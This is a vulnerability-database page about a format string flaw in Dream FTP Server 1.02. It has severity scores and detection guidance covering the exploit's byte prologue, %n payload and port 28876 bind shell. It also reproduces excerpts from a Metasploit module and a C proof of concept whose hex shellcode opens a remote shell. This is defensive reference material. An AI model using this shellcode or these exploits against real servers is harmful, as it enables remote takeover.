CVE-2004-2074
published 2004-12-31CVE-2004-2074: Format string vulnerability in Dream FTP 1.02 allows local users to cause a denial of service (crash) via format string specifiers in the (1) PASS or (2) RETR…
PriorityP423medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
35.78%
98.3th percentile
Format string vulnerability in Dream FTP 1.02 allows local users to cause a denial of service (crash) via format string specifiers in the (1) PASS or (2) RETR commands.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bolintech | dream_ftp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x29 (jump over format string exploit prefix)
- →Detect exploit traffic by matching the format string pattern sent over FTP (port 21): a sequence of multiple %8x format specifiers followed by a large decimal width %Nd%n pattern, preceded by the \xeb\x29 JMP stub. ↗
- →Alert on FTP sessions to port 21 where the USER command payload contains the byte sequence EB 29 followed by repeated %8x format specifiers — this is the exploit's fixed prologue. ↗
- →Monitor for unexpected outbound connections to port 28876 from FTP server hosts — successful exploitation binds a shell on that port. ↗
- →Check FTP banner for 'Dream FTP Server' to identify vulnerable targets; the Metasploit module uses this string as its check condition. ↗
- →The exploit targets the PASS or RETR FTP commands with format string specifiers; monitor FTP command arguments for %n, %x, or large %d width specifiers in those commands. ↗
- ·The Metasploit module hardcodes a single universal offset (0x3c63FF - 0x4f = 3957680) targeting the SEH handler; this offset was tested only against Windows 2000 SP0 and SP4 English and may not be reliable on other OS/SP combinations. ↗
- ·Payload bad characters exclude null byte, LF, and CR (\x00\x0a\x0d), which constrains shellcode selection and may affect detection signatures that rely on those bytes as delimiters. ↗
- ·The original PoC exploit targets Dream FTP v1.2 (also identified as 1.02 / TryFTP 1.0.0.1), indicating the vulnerability spans multiple version strings of the same product. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BolinTech DreamFTP Server 1.02 - Format String (Metasploit)
exploitdb·2010-06-22
CVE-2004-2074 BolinTech DreamFTP Server 1.02 - Format String (Metasploit)
BolinTech DreamFTP Server 1.02 - Format String (Metasploit)
---
##
# $Id: dreamftp_format.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BolinTech Dream FTP Server 1.02 Format String',
'Description' => %q{
This module exploits a format string overflow in the BolinTech
Dream FTP Server version 1.02. Based on the exploit by SkyLined.
},
'Author' => [ 'Patrick Webster ' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2004-2074'],
[ 'OSVDB',
Exploit-DB
BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String
exploitdb·2004-02-11
CVE-2004-2074 BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String
BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String
---
#include
#include
#include
#include
// WIN NT/2K/XP cmd.exe shellcode
// kernel32.dll baseaddress calculation: OS/SP-independent
// string-save: 00, 0a and 0d free.
// portbinding: port 28876
// looping: reconnect after disconnect
char* shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8
Metasploit
BolinTech Dream FTP Server 1.02 Format String
metasploit
BolinTech Dream FTP Server 1.02 Format String
BolinTech Dream FTP Server 1.02 Format String
This module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined.
No writeups or analysis indexed.
2004-12-31
Published